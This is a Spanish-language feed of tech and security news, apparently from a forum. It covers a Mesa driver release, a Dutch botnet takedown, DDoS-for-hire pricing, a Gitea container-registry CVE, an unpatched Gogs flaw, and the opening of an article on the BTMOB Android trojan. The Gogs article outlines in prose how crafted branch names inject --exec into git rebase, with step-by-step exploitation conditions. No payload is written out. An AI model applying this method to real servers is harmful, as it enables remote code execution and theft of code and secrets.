En esta versión, Mesa añade soporte para los cambios introducidos en LLVM 23, una de las infraestructuras de compilación más utilizadas dentro del ecosistema Linux.

La incorporación de estas mejoras evita problemas de compilación y facilita la integración de Mesa en distribuciones que ya están comenzando a adoptar las versiones más recientes de LLVM.

Esto garantiza una transición más fluida para desarrolladores y mantenedores de distribuciones Linux.

Mejoras para PowerVR y componentes GLX

Además de las optimizaciones destinadas a AMD, Intel y NVIDIA, la actualización también incorpora correcciones para el controlador Vulkan de PowerVR.

Asimismo, los desarrolladores han implementado diversos ajustes relacionados con GLX en entornos Windows, mejorando la interoperabilidad y corrigiendo errores detectados en determinadas configuraciones.

Aunque estas modificaciones pueden parecer menores frente a otros cambios más visibles, contribuyen significativamente a la estabilidad global del proyecto y a la compatibilidad con diferentes plataformas y arquitecturas.

El fin de la serie Mesa 26.0

Con el lanzamiento de Mesa 26.0.8 concluye oficialmente el ciclo de vida de la rama estable 26.0.

Desde su debut inicial en febrero, esta serie ha introducido numerosas mejoras relacionadas con:

• Rendimiento Vulkan.
• Compatibilidad con videojuegos modernos.
• Optimización para GPUs AMD Radeon.
• Avances en trazado de rayos (Ray Tracing).
• Mejoras para controladores Intel y NVIDIA.
• Mayor estabilidad general del sistema gráfico.

A partir de ahora, los usuarios que deseen seguir recibiendo actualizaciones, optimizaciones y correcciones deberán migrar a la serie Mesa 26.1.

Por otro lado, quienes prefieran probar las tecnologías más recientes podrán optar por las versiones de desarrollo de Mesa 26.2, donde continúan implementándose nuevas funciones y mejoras experimentales.

¿Por qué actualizar a Mesa 26.0.8?

Aunque se trata de una actualización incremental, instalar Mesa 26.0.8 resulta altamente recomendable para cualquier usuario de Linux que utilice aplicaciones gráficas, videojuegos o herramientas profesionales de aceleración por GPU.

Las correcciones incorporadas ayudan a:

• Mejorar la estabilidad del sistema.
• Reducir errores gráficos.
• Incrementar la compatibilidad con videojuegos modernos.
• Optimizar el funcionamiento de Vulkan.
• Evitar problemas de compilación con LLVM 23.
• Mantener un entorno gráfico más fiable y seguro.

Para usuarios de AMD, Intel y NVIDIA, esta actualización representa la versión más refinada y estable de toda la serie 26.0.

En fin...

Mesa 26.0.8 pone el broche final a una de las ramas más importantes del proyecto de controladores gráficos de código abierto para Linux. Aunque no introduce nuevas funciones destacadas, sí consolida los avances logrados durante toda la serie mediante una amplia colección de correcciones y mejoras orientadas a la estabilidad, el rendimiento y la compatibilidad.

Las optimizaciones para AMD Radeon, Intel ANV, NVIDIA NVK, PowerVR y Vulkan convierten a esta actualización en una instalación prácticamente obligatoria para quienes buscan la mejor experiencia gráfica posible en Linux. Con el cierre de la serie 26.0, la comunidad ya dirige su atención hacia Mesa 26.1 y las futuras innovaciones que llegarán con la próxima generación de controladores gráficos de código abierto.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Las autoridades de los Países Bajos han logrado uno de los mayores golpes contra la infraestructura del cibercrimen en los últimos años tras desmantelar una gigantesca botnet compuesta por al menos 17 millones de dispositivos comprometidos. La operación, coordinada por la Policía neerlandesa y el Centro Nacional de Ciberseguridad (NCSC), culminó con la incautación de más de 200 servidores utilizados para controlar una extensa red de equipos infectados empleados en actividades ilícitas.

La acción representa un importante avance en la lucha contra las amenazas cibernéticas globales, especialmente aquellas relacionadas con ataques DDoS, redes proxy maliciosas y otras operaciones criminales que dependen de infraestructuras distribuidas para ocultar su actividad.

Una red de 17 millones de dispositivos comprometidos

Según informó el NCSC, la investigación permitió identificar una enorme infraestructura que controlaba millones de ordenadores, teléfonos inteligentes, tabletas y otros dispositivos conectados a Internet.

Las autoridades determinaron que la botnet estaba formada por al menos 17 millones de dispositivos infectados, mientras que más de 200 servidores ubicados en territorio neerlandés eran utilizados para gestionar la operación y coordinar actividades maliciosas a gran escala.

Durante la investigación, los agentes descubrieron que estos sistemas comprometidos eran utilizados para ejecutar diversos tipos de ciberataques y actividades ilegales, aprovechando el poder combinado de millones de dispositivos distribuidos en múltiples países.

La policía procedió a incautar los servidores involucrados, mientras que el proveedor de alojamiento donde se encontraban alojados colaboró desconectando la infraestructura una vez que se confirmó su uso en actividades delictivas.

¿Qué es una botnet y por qué representa una amenaza?

Una botnet es una red de dispositivos infectados por malware que pueden ser controlados remotamente por ciberdelincuentes sin el conocimiento de sus propietarios.

Los equipos comprometidos, conocidos como "bots" o "zombis", pueden incluir:

• Computadoras personales.
• Servidores.
• Smartphones.
• Tablets.
• Dispositivos IoT.
• Cámaras de seguridad conectadas.
• Routers domésticos.

Una vez comprometidos, estos dispositivos pasan a formar parte de una red centralizada utilizada para ejecutar diversas operaciones criminales.

Entre los usos más frecuentes de una botnet destacan:

Ataques DDoS

Los ataques de Denegación de Servicio Distribuida (DDoS) utilizan miles o millones de dispositivos para generar enormes volúmenes de tráfico dirigidos contra un objetivo específico, provocando la caída de sitios web, aplicaciones o servicios online.

Redes proxy ilícitas

Las botnets también pueden emplearse para redirigir tráfico malicioso a través de dispositivos infectados, ocultando la ubicación real de los atacantes y dificultando su rastreo.

Minería ilegal de criptomonedas

Los ciberdelincuentes aprovechan la capacidad de procesamiento de los dispositivos comprometidos para minar criptomonedas sin autorización, consumiendo recursos y energía de las víctimas.

Fraude y distribución de malware

Estas redes pueden utilizarse para enviar campañas masivas de spam, distribuir software malicioso o participar en actividades de fraude digital.

Asocks, el servicio señalado por medios locales

Aunque las autoridades neerlandesas no identificaron públicamente el nombre de la botnet desmantelada, diversos medios locales vincularon la operación con Asocks, una plataforma que se promociona como un servicio de proxy universal.

Según la información disponible públicamente, Asocks afirma ofrecer acceso a más de 7 millones de direcciones IP distribuidas en aproximadamente 150 ubicaciones geográficas y contar con más de 100.000 clientes.

La plataforma comercializa diferentes tipos de servicios proxy:

• Proxies residenciales.
• Proxies móviles.
• Proxies corporativos.
• Soluciones para automatización y anonimato.

Los planes de suscripción oscilan entre 5 y 15 dólares mensuales, aunque también se ofrecen descuentos para compras al por mayor y clientes empresariales.

Sin embargo, la intervención de las autoridades sugiere que una parte significativa de las direcciones IP utilizadas por la plataforma podría haber procedido de dispositivos comprometidos cuyos propietarios desconocían completamente su participación en estas actividades.

El creciente problema de las redes proxy basadas en dispositivos infectados

En los últimos años, numerosos servicios de proxies residenciales han ganado popularidad entre empresas, investigadores y usuarios que buscan ocultar su ubicación o distribuir tráfico de red.

Muchos proveedores legítimos obtienen direcciones IP mediante programas voluntarios donde los usuarios aceptan compartir una parte de su ancho de banda a cambio de incentivos económicos.

No obstante, los expertos en ciberseguridad han advertido repetidamente sobre plataformas que podrían obtener acceso a dispositivos mediante métodos poco transparentes o incluso mediante infecciones de malware.

Cuando esto ocurre, los usuarios afectados pueden convertirse involuntariamente en parte de infraestructuras utilizadas para actividades delictivas sin tener conocimiento alguno de ello.

El papel de la cooperación entre autoridades y sector privado

La operación desarrollada en los Países Bajos demuestra la importancia de la colaboración entre organismos gubernamentales, fuerzas de seguridad y empresas privadas para combatir el cibercrimen.

Las botnets modernas operan a escala global y suelen distribuir su infraestructura entre múltiples países para dificultar su detección y desmantelamiento.

Por esta razón, la cooperación internacional y el intercambio de inteligencia se han convertido en elementos fundamentales para identificar servidores de mando y control, rastrear a los operadores y neutralizar redes criminales antes de que puedan causar daños significativos.

Cómo protegerse frente a las infecciones de botnets

La mejor defensa contra las botnets sigue siendo la prevención. Los expertos recomiendan adoptar varias medidas de seguridad para reducir el riesgo de compromiso.

Cambiar las credenciales predeterminadas

Muchos dispositivos de red se comercializan con nombres de usuario y contraseñas genéricas que pueden ser explotadas fácilmente por atacantes automatizados.

Mantener actualizado el firmware

Las actualizaciones de firmware suelen corregir vulnerabilidades críticas que podrían ser utilizadas para comprometer dispositivos conectados a Internet.

Desactivar la administración remota innecesaria

Si no es imprescindible acceder al dispositivo desde Internet, es recomendable desactivar las funciones de administración remota para reducir la superficie de ataque.

Utilizar autenticación robusta

La implementación de contraseñas únicas y complejas, junto con mecanismos de autenticación multifactor cuando estén disponibles, añade una capa adicional de protección.

Supervisar el tráfico de red

Un incremento inusual del consumo de ancho de banda o actividad sospechosa puede ser una señal temprana de infección por malware.

En fin...

El desmantelamiento de esta botnet de 17 millones de dispositivos marca uno de los mayores éxitos recientes contra las infraestructuras utilizadas por el cibercrimen. La incautación de más de 200 servidores demuestra que las autoridades continúan intensificando sus esfuerzos para combatir redes criminales capaces de afectar a millones de usuarios en todo el mundo.

Sin embargo, el caso también pone de manifiesto una realidad preocupante: millones de dispositivos conectados siguen siendo vulnerables a infecciones que pueden convertirlos en herramientas al servicio de ciberdelincuentes. En un entorno digital cada vez más interconectado, la adopción de buenas prácticas de ciberseguridad sigue siendo la primera línea de defensa frente a amenazas como las botnets, los ataques DDoS y las redes proxy maliciosas.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Los ataques de denegación de servicio distribuida (DDoS) han evolucionado de manera significativa durante los últimos años. Lo que antes requería conocimientos técnicos avanzados, infraestructura propia y experiencia en redes, hoy puede adquirirse con apenas unos clics y por unos pocos dólares al mes.

La profesionalización del denominado DDoS-as-a-Service (DDoSaaS) está transformando el panorama de las amenazas digitales. Plataformas clandestinas ofrecen paneles intuitivos, automatización, soporte técnico, acceso mediante API e incluso programas de reventa, permitiendo que usuarios con escasos conocimientos técnicos puedan lanzar ataques capaces de interrumpir servicios online de empresas, gobiernos y organizaciones de todo el mundo.

Este fenómeno no solo reduce la barrera de entrada al cibercrimen, sino que también amplía significativamente el número de actores capaces de generar interrupciones masivas en Internet.

¿Qué es un ataque DDoS?

Un ataque de Denegación de Servicio Distribuida (DDoS) consiste en inundar un servidor, sitio web, aplicación o infraestructura de red con enormes cantidades de tráfico procedente de múltiples dispositivos comprometidos simultáneamente.

El objetivo principal es agotar los recursos disponibles hasta que el servicio deje de responder o se vuelva extremadamente lento para los usuarios legítimos.

Los ataques DDoS pueden dirigirse a diferentes capas de la infraestructura tecnológica:

• Ataques de Capa 3 y Capa 4: enfocados en saturar la capacidad de red y el ancho de banda.
• Ataques de Capa 7: orientados a aplicaciones web, APIs, formularios de inicio de sesión y otros recursos específicos.

A diferencia de otros tipos de ciberataques, los DDoS no buscan necesariamente robar información o comprometer sistemas internos. Su propósito es interrumpir operaciones, provocar pérdidas económicas y afectar la disponibilidad de los servicios.

Ataques récord demuestran la magnitud de la amenaza

La gravedad de esta tendencia queda reflejada en algunos de los mayores ataques registrados recientemente.

Durante 2025, Cloudflare informó haber bloqueado un ataque de 7,3 Tbps, seguido posteriormente por otro de 31,4 Tbps, considerado uno de los mayores ataques DDoS documentados hasta la fecha.

Por su parte, Microsoft reveló que su plataforma Azure mitigó un ataque de 15,72 Tbps en octubre de 2025, actividad que fue atribuida a la conocida botnet Aisuru.

Estos incidentes evidencian que las capacidades ofensivas disponibles para los ciberdelincuentes continúan creciendo a un ritmo acelerado.

La evolución del mercado clandestino DDoS

Una investigación realizada por Flare analizó la actividad relacionada con servicios DDoS en mercados clandestinos durante dos periodos distintos: los primeros cinco meses de 2023 y los primeros cinco meses de 2026.

Los resultados muestran una transformación notable.

2023: herramientas dispersas y servicios básicos

Durante 2023 predominaban anuncios relacionados con:

• Scripts de ataque.
• Herramientas filtradas.
• Tutoriales técnicos.
• Botnets compartidas.
• Servicios genéricos de DDoS.

Muchos vendedores promocionaban capacidades técnicas sin enfocarse demasiado en la experiencia del cliente. Las publicaciones frecuentemente eran reutilizadas entre diferentes actores y mostraban un nivel limitado de diferenciación comercial.

2026: servicios completos y experiencia de usuario

En contraste, las ofertas observadas en 2026 presentan características propias de empresas tecnológicas legítimas.

Los anuncios incluyen:

• Paneles web intuitivos.
• Integración mediante API.
• Automatización completa.
• Soporte técnico 24/7.
• Planes de suscripción mensuales.
• Estadísticas en tiempo real.
• Programas para revendedores.
• Promesas de anonimato.
• Capacidad de eludir sistemas de protección.

Servicios como SatelliteStress, Areshun y RebirthStress se promocionan utilizando estrategias de marketing similares a las empleadas por plataformas SaaS legítimas.

La diferencia es clara: el producto ya no se vende únicamente por su potencia, sino también por su facilidad de uso, escalabilidad y experiencia para el cliente.

El lenguaje comercial reemplaza al lenguaje técnico

Uno de los hallazgos más interesantes del análisis es cómo los aspectos técnicos han sido transformados en argumentos de venta.

Los anuncios modernos utilizan términos como:

• Panel de control.
• API integrada.
• Monitoreo en tiempo real.
• Uptime garantizado.
• Bypass de protecciones.
• Soporte premium.
• Slots de ataque.
• Escalabilidad.

Incluso servicios asociados a grandes botnets destacan métricas específicas para atraer clientes, incluyendo cantidad de bots activos, capacidad de ancho de banda y duración máxima de los ataques.

Aunque muchas de estas afirmaciones podrían estar exageradas, reflejan claramente qué características valoran actualmente los compradores dentro de este ecosistema criminal.

El bajo coste de lanzar un ataque DDoS

Uno de los factores más preocupantes es el precio.

Según la investigación, algunas ofertas observadas en foros clandestinos incluyen:

• Ataques de una hora desde 5 dólares.
• Ataques contra sitios web por 10 dólares.
• Campañas de 24 horas por aproximadamente 25 dólares.

Sin embargo, también existen opciones más sofisticadas.

Algunos proveedores ofrecen:

• Ataques avanzados desde 100 dólares diarios.
• Campañas contra infraestructuras protegidas por 500 dólares al día.
• Redes completas de botnets anunciadas por hasta 2.000 dólares.

Esta segmentación demuestra que el mercado se adapta a distintos perfiles de clientes, desde usuarios novatos hasta actores criminales con mayores recursos y objetivos más ambiciosos.

El auge de los servicios Booter y Stresser

Los denominados Booter Services o Stresser Services representan una parte importante de este ecosistema.

Originalmente se presentaban como herramientas para realizar pruebas de estrés autorizadas sobre infraestructuras propias. Sin embargo, muchas de estas plataformas han sido utilizadas para ejecutar ataques ilegales contra terceros.

Su funcionamiento es simple:

• El usuario crea una cuenta.
• Selecciona un plan de pago.
• Introduce el objetivo.
• Configura la duración del ataque.
• Ejecuta la operación desde un panel web.

La simplicidad del proceso elimina prácticamente cualquier barrera técnica para lanzar un ciberataque.

Por qué las empresas deben preocuparse

La principal preocupación para las organizaciones es que ya no se necesita ser un experto en ciberseguridad para ejecutar un ataque DDoS.

La profesionalización del modelo DDoS-as-a-Service significa que:

• Los ataques son más accesibles.
• Los costes son extremadamente bajos.
• Existen programas de reventa que amplían la distribución.
• La automatización simplifica las operaciones.
• La disponibilidad de botnets sigue creciendo.

Como resultado, cualquier empresa con presencia digital puede convertirse en objetivo de actores con capacidades significativas, independientemente de su nivel técnico.

El futuro del DDoS como servicio

Todo apunta a que el mercado clandestino continuará evolucionando hacia modelos cada vez más sofisticados y comerciales.

Los investigadores prevén un incremento en:

• Automatización avanzada.
• Integraciones mediante API.
• Programas de afiliados y reventa.
• Modelos de suscripción escalables.
• Servicios especializados para sectores específicos.
• Herramientas de evasión más sofisticadas.

En otras palabras, el DDoS-as-a-Service está siguiendo una trayectoria similar a la de muchas plataformas SaaS legítimas, pero orientada a actividades ilícitas.

En fin...

El DDoS como servicio ha dejado de ser una simple herramienta utilizada por ciberdelincuentes experimentados para convertirse en una industria clandestina altamente organizada. La combinación de precios bajos, interfaces intuitivas, automatización y soporte técnico está facilitando que cualquier persona pueda contratar ataques capaces de interrumpir servicios críticos en cuestión de minutos.

Para las empresas, esta evolución supone un desafío creciente. La amenaza ya no depende únicamente de actores altamente cualificados, sino también de individuos con recursos limitados que pueden acceder fácilmente a infraestructura de ataque profesional. En un entorno donde la disponibilidad de los servicios digitales es fundamental para la continuidad operativa, fortalecer las estrategias de mitigación DDoS y resiliencia tecnológica se ha convertido en una prioridad estratégica para cualquier organización conectada a Internet.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Investigadores en ciberseguridad han revelado una peligrosa vulnerabilidad en Gitea, la popular plataforma de código abierto y autoalojada para control de versiones y colaboración DevOps, que permite a atacantes remotos no autenticados acceder y descargar imágenes privadas de contenedores sin necesidad de credenciales.

La falla de seguridad, identificada como CVE-2026-27771 y catalogada con una puntuación CVSS de 8,2, afecta a todas las versiones de Gitea anteriores a la 1.26.2 y representa una amenaza significativa para organizaciones que utilizan registros de contenedores privados dentro de sus infraestructuras de desarrollo.

El descubrimiento fue realizado por la firma de seguridad Noscope, cuyos investigadores advirtieron que el problema permaneció oculto durante casi cuatro años y podría impactar a más de 30.000 despliegues de Gitea distribuidos en más de 30 países.

¿Qué es Gitea y por qué esta vulnerabilidad es tan grave?

Gitea es una plataforma Git autoalojada ampliamente utilizada por empresas, desarrolladores y equipos DevOps como alternativa ligera a GitHub Enterprise y GitLab.

Además de gestionar repositorios de código fuente, Gitea ofrece funciones para alojar registros de contenedores, permitiendo a las organizaciones almacenar imágenes Docker y otros artefactos utilizados en entornos CI/CD y despliegues de aplicaciones.

El problema descubierto radica en que las imágenes de contenedores marcadas como privadas no estaban realmente protegidas de forma adecuada.

Según Noscope, cualquier persona conectada a Internet podía descargar imágenes privadas de contenedores desde instancias vulnerables de Gitea sin necesidad de:

• Crear una cuenta.
• Introducir credenciales.
• Disponer de permisos previos.
• Tener acceso autenticado a la plataforma.

En otras palabras, los registros privados funcionaban como si fueran públicos.

Cómo funciona CVE-2026-27771

Aunque los detalles técnicos completos no han sido publicados intencionadamente para evitar abusos inmediatos, los investigadores explicaron que la vulnerabilidad afecta directamente al mecanismo de control de acceso del registro de contenedores integrado en Gitea.

En las versiones vulnerables, la etiqueta "privado" aplicada a los repositorios de contenedores no imponía las restricciones de autenticación que los administradores esperaban.

Esto permitía que atacantes externos extrajeran imágenes privadas mediante solicitudes directas al registro de contenedores.

La gravedad de esta exposición depende del tipo de imágenes almacenadas por cada organización.

En muchos entornos corporativos, las imágenes privadas contienen:

• Código propietario.
• Configuraciones internas.
• Claves API.
• Tokens de acceso.
• Variables de entorno sensibles.
• Secretos de infraestructura.
• Dependencias internas no públicas.

La filtración de este tipo de información podría facilitar ataques posteriores contra sistemas empresariales, entornos cloud y pipelines de desarrollo.

Más de 30.000 servidores potencialmente afectados

Noscope indicó que la vulnerabilidad probablemente afecta a más de 30.000 despliegues de Gitea distribuidos globalmente.

Los países con mayor número de exposiciones incluyen:

• China
• Estados Unidos
• Alemania
• Francia
• Reino Unido

Además, los investigadores identificaron organizaciones vulnerables pertenecientes a sectores críticos como:

• Servicios sanitarios.
• Industria aeroespacial.
• Comercio minorista.
• Proveedores de servicios de internet.
• Infraestructura tecnológica.
• Empresas de desarrollo de software.

La exposición prolongada durante casi cuatro años aumenta significativamente la preocupación, ya que es posible que actores maliciosos hayan explotado el fallo antes de su divulgación pública.

Forgejo también estaría afectado

Los investigadores advirtieron que cualquier bifurcación (fork) derivada de Gitea debería considerarse potencialmente vulnerable hasta que sea auditada de forma independiente.

En pruebas realizadas por Noscope, se confirmó que Forgejo, una popular bifurcación comunitaria de Gitea, también se encuentra afectada por el problema.

Esto amplía considerablemente el alcance potencial de la vulnerabilidad dentro del ecosistema DevOps y de plataformas Git autoalojadas.

Riesgos para empresas y entornos DevOps

Las imágenes privadas de contenedores son componentes fundamentales en infraestructuras modernas basadas en microservicios, Kubernetes y despliegues cloud.

La exposición no autorizada de estos recursos puede derivar en múltiples escenarios de riesgo:

Robo de propiedad intelectual

Los atacantes pueden acceder a aplicaciones internas, componentes propietarios y herramientas empresariales no públicas.

Filtración de secretos y credenciales

Muchas imágenes contienen claves API, certificados, tokens de autenticación y configuraciones sensibles integradas accidentalmente.

Ataques a la cadena de suministro

Los ciberdelincuentes podrían analizar dependencias internas y preparar ataques dirigidos contra pipelines CI/CD o sistemas de compilación.

Reconocimiento de infraestructura

Las imágenes permiten identificar arquitecturas, tecnologías utilizadas y servicios internos desplegados por la organización.

Escalamiento hacia entornos cloud

La obtención de secretos cloud podría facilitar accesos posteriores a AWS, Azure, Google Cloud u otras plataformas corporativas.

Ausencia de detalles técnicos completos

Noscope explicó que decidió no publicar información técnica detallada sobre CVE-2026-27771 de manera inmediata para permitir que el ecosistema Gitea tenga tiempo suficiente para aplicar parches y reducir el riesgo de explotación masiva.

Esta práctica es habitual en divulgaciones responsables de vulnerabilidades críticas, especialmente cuando existen miles de sistemas potencialmente expuestos en Internet.

Sin embargo, la falta de detalles públicos no reduce el riesgo actual, particularmente para organizaciones que mantienen instancias accesibles desde redes públicas.

Solución y versiones corregidas

Los mantenedores de Gitea solucionaron el problema en la versión 1.26.2, por lo que se recomienda actualizar inmediatamente todos los servidores vulnerables.

La actualización representa actualmente la principal medida de protección contra posibles accesos no autorizados a imágenes privadas.

Mitigación temporal para administradores

En escenarios donde la actualización inmediata no sea posible, Noscope recomienda habilitar la siguiente configuración temporal:

• [service]
• REQUIRE_SIGNIN_VIEW = true

Esta opción obliga a los usuarios a autenticarse antes de acceder al contenido del servidor.

No obstante, los expertos aclaran que esta solución puede resultar problemática en entornos donde algunos contenedores deban permanecer públicamente accesibles.

Por ello, la actualización completa sigue siendo la medida recomendada.

La seguridad de registros de contenedores bajo la lupa

El descubrimiento de CVE-2026-27771 pone nuevamente en evidencia los riesgos asociados a configuraciones erróneas y fallos de control de acceso en plataformas DevOps modernas.

Los registros de contenedores se han convertido en objetivos prioritarios para actores maliciosos debido al enorme valor estratégico de las imágenes almacenadas.

Durante los últimos años, múltiples incidentes de ciberseguridad han demostrado cómo secretos filtrados desde imágenes Docker y repositorios Git pueden facilitar compromisos de gran escala.

Por esta razón, las organizaciones deben implementar auditorías periódicas, controles de acceso estrictos y monitoreo continuo sobre sus infraestructuras de desarrollo.

Una amenaza crítica para infraestructuras modernas

La vulnerabilidad CVE-2026-27771 representa uno de los problemas de seguridad más importantes descubiertos recientemente en el ecosistema Gitea.

La posibilidad de acceder a imágenes privadas de contenedores sin autenticación supone un riesgo crítico para empresas que dependen de infraestructuras DevOps y despliegues basados en contenedores.

Con miles de servidores potencialmente expuestos alrededor del mundo, la actualización inmediata a Gitea 1.26.2 se convierte en una prioridad urgente para reducir riesgos de filtración, espionaje industrial y ataques contra cadenas de suministro de software.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Una peligrosa vulnerabilidad zero-day sin parche en Gogs, la popular plataforma Git autoalojada escrita en Go, está generando preocupación entre expertos en ciberseguridad debido a su potencial para permitir ejecución remota de código (RCE) en servidores expuestos a Internet.

El fallo de seguridad afecta a las versiones más recientes de Gogs, incluidas Gogs 0.14.2 y 0.15.0+dev, y podría ser explotado por atacantes autenticados sin privilegios administrativos para comprometer completamente el servidor vulnerable.

La amenaza resulta especialmente crítica porque Gogs suele desplegarse como alternativa ligera a GitHub Enterprise y GitLab, principalmente en entornos corporativos y proyectos de desarrollo colaborativo accesibles de forma remota.

Según el investigador senior de seguridad de Rapid7, Jonah Burgess, quien descubrió la vulnerabilidad, el problema radica en una falla de inyección de argumentos que aún no ha recibido un identificador CVE oficial y que permanece sin parche pese a haber sido reportada a los mantenedores del proyecto desde marzo.

Cómo funciona la vulnerabilidad zero-day de Gogs

La falla afecta directamente al mecanismo de fusión "Rebase before merge" utilizado durante las operaciones de pull requests.

Un atacante puede aprovechar nombres de ramas especialmente manipulados para inyectar el parámetro --exec en el comando git rebase, permitiendo la ejecución arbitraria de comandos en el servidor donde se ejecuta Gogs.

El problema es especialmente peligroso debido a que los usuarios con permisos básicos pueden explotar la vulnerabilidad sin necesidad de privilegios administrativos.

Además, la configuración predeterminada de Gogs facilita enormemente el ataque.

De acuerdo con Rapid7, el software se distribuye con el registro abierto habilitado por defecto (DISABLE_REGISTRATION = false) y sin restricciones en la creación de repositorios (MAX_CREATION_LIMIT = -1).

Esto significa que un atacante no autenticado simplemente necesita:

• Crear una cuenta en la instancia vulnerable.
• Generar un repositorio propio.
• Activar la opción de fusión mediante rebase.
• Enviar una pull request utilizando una rama maliciosa.

Todo el proceso puede ejecutarse sin interacción adicional de otros usuarios.

Impacto de la ejecución remota de código en Gogs

La explotación exitosa de esta vulnerabilidad podría tener consecuencias devastadoras para organizaciones que utilizan Gogs como plataforma de desarrollo interno.

Entre los riesgos identificados por los investigadores se encuentran:

• Ejecución remota de código arbitrario en el servidor.
• Robo de todos los repositorios alojados, incluidos proyectos privados.
• Exposición de hashes de contraseñas y tokens API.
• Compromiso de claves SSH y secretos de autenticación multifactor.
• Movimiento lateral hacia otros sistemas accesibles desde la red interna.
• Modificación maliciosa de código fuente alojado en la plataforma.
• Inserción de puertas traseras en proyectos de software.

El acceso a repositorios privados representa uno de los escenarios más peligrosos, especialmente para empresas tecnológicas y equipos DevOps que almacenan credenciales, configuraciones sensibles o código propietario dentro de sus proyectos Git.

Un problema recurrente en Gogs

Rapid7 indicó que esta nueva vulnerabilidad comparte similitudes con múltiples fallos previos relacionados con inyección de argumentos en Gogs.

Entre las vulnerabilidades anteriores destacan:

• CVE-2024-39933
• CVE-2024-39932
• CVE-2026-26194
• CVE-2024-39930

Aunque dichas fallas fueron corregidas en el pasado, el nuevo zero-day afecta una ruta de código distinta denominada Merge(), que aparentemente nunca recibió las protecciones adecuadas.

Esto evidencia posibles debilidades persistentes en la validación de argumentos y manejo de comandos Git dentro del proyecto.

Más de 2.400 servidores Gogs expuestos a Internet

La magnitud del problema se agrava debido al elevado número de instancias Gogs accesibles públicamente.

El organismo Shadowserver informó que actualmente existen más de 2.400 servidores Gogs expuestos online, principalmente en Asia y Europa.

Por su parte, el motor de búsqueda Shodan identificó más de 1.000 direcciones IP con huellas digitales compatibles con Gogs.

La combinación de:

• Registro abierto activado por defecto,
• Ausencia de límites de creación de repositorios,
• Exposición directa a Internet,
• Y falta de parche disponible,

convierte esta vulnerabilidad en un objetivo extremadamente atractivo para ciberdelincuentes y actores de amenazas avanzadas.

Antecedentes: ataques zero-day previos contra Gogs

La situación recuerda lo ocurrido con la vulnerabilidad CVE-2025-8110, otra falla crítica de ejecución remota de código en Gogs que fue explotada activamente antes de la publicación de parches.

En aquella ocasión, investigadores de Wiz descubrieron la vulnerabilidad mientras analizaban un servidor comprometido expuesto a Internet.

Los expertos alertaron que muchas instancias vulnerables mantenían habilitado el registro abierto, ampliando considerablemente la superficie de ataque.

Aunque Wiz reportó la vulnerabilidad en julio, los mantenedores reconocieron el problema meses después y publicaron los parches a principios de enero.

Posteriormente, la Agencia de Ciberseguridad y Seguridad de Infraestructura de Estados Unidos (CISA) confirmó que la vulnerabilidad estaba siendo explotada activamente y la añadió a su catálogo de vulnerabilidades explotadas en la naturaleza.

CISA incluso ordenó a las agencias federales asegurar sus servidores antes de la fecha límite establecida debido al elevado riesgo operativo.

Riesgos para empresas y desarrolladores

Las plataformas Git autoalojadas son infraestructuras críticas para miles de organizaciones modernas.

Cualquier vulnerabilidad RCE en estos entornos puede convertirse rápidamente en un punto de entrada para:

• Ataques a la cadena de suministro de software.
• Robo de propiedad intelectual.
• Compromiso de pipelines CI/CD.
• Distribución de malware mediante repositorios comprometidos.
• Escalamiento de privilegios dentro de redes corporativas.

Los ataques contra plataformas DevOps han aumentado significativamente durante los últimos años debido al enorme valor estratégico que representan para actores maliciosos y grupos APT.

Recomendaciones de seguridad para administradores de Gogs

Mientras no exista un parche oficial disponible, los expertos recomiendan adoptar medidas de mitigación inmediatas:

Deshabilitar el registro abierto

Limitar la creación de nuevas cuentas reduce drásticamente la superficie de ataque.

Restringir la creación de repositorios

Configurar límites estrictos puede impedir abusos automatizados.

Desactivar temporalmente "Rebase before merge"

Esta funcionalidad es el principal vector de explotación identificado.

Restringir acceso desde Internet

Siempre que sea posible, las instancias Gogs deberían mantenerse detrás de VPN o firewalls corporativos.

Monitorizar actividad sospechosa

Los administradores deben revisar:

• Pull requests inusuales.
• Nombres de ramas sospechosos.
• Creación masiva de repositorios.
• Comandos anómalos ejecutados por el servidor Git.

Implementar autenticación multifactor

Aunque no elimina la vulnerabilidad, ayuda a reducir riesgos de acceso no autorizado.

Un escenario crítico para la seguridad DevOps

La nueva vulnerabilidad zero-day en Gogs demuestra nuevamente cómo las plataformas de desarrollo y colaboración se han convertido en objetivos prioritarios para el cibercrimen moderno.

La ausencia de un parche oficial, combinada con miles de servidores expuestos públicamente, crea un escenario de alto riesgo para organizaciones que dependen de Gogs en sus operaciones diarias.

Hasta que exista una actualización de seguridad definitiva, los administradores deberán aplicar medidas de mitigación urgentes para evitar posibles compromisos de infraestructura, robo de código fuente y ataques a la cadena de suministro de software.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El ecosistema de amenazas móviles continúa evolucionando rápidamente y los ciberdelincuentes están apostando cada vez más por plataformas de malware como servicio (MaaS) para expandir sus operaciones. Uno de los casos más recientes y peligrosos es BTMOB, un troyano de acceso remoto para Android que se comercializa abiertamente entre actores maliciosos y que ya está siendo utilizado en campañas de phishing dirigidas principalmente a usuarios de Brasil y América Latina.

Investigadores de la firma de ciberseguridad ESET han advertido que BTMOB ofrece capacidades avanzadas de espionaje, robo de datos y fraude financiero, además de incluir una interfaz constructora que permite a los delincuentes generar cargas maliciosas personalizadas sin necesidad de conocimientos de programación.

La amenaza representa un nuevo nivel de sofisticación dentro del panorama de malware móvil, especialmente porque facilita el acceso a herramientas avanzadas de ataque para ciberdelincuentes con poca experiencia técnica.

¿Qué es BTMOB y cómo funciona?

BTMOB es un troyano de acceso remoto (RAT) diseñado específicamente para dispositivos Android. Su principal objetivo es comprometer teléfonos móviles mediante aplicaciones falsas distribuidas a través de campañas de phishing.

A diferencia de otros malware tradicionales, BTMOB opera bajo el modelo Malware-as-a-Service (MaaS), lo que significa que sus desarrolladores alquilan la plataforma a otros ciberdelincuentes mediante suscripciones mensuales o licencias permanentes.

Según los investigadores, los operadores pueden obtener acceso al malware pagando alrededor de 700 dólares mensuales o hasta 5.000 dólares por una licencia vitalicia. Las ventas se realizan principalmente a través de canales privados de Telegram, donde también se ofrecen herramientas adicionales para personalizar ataques y generar campañas dirigidas.

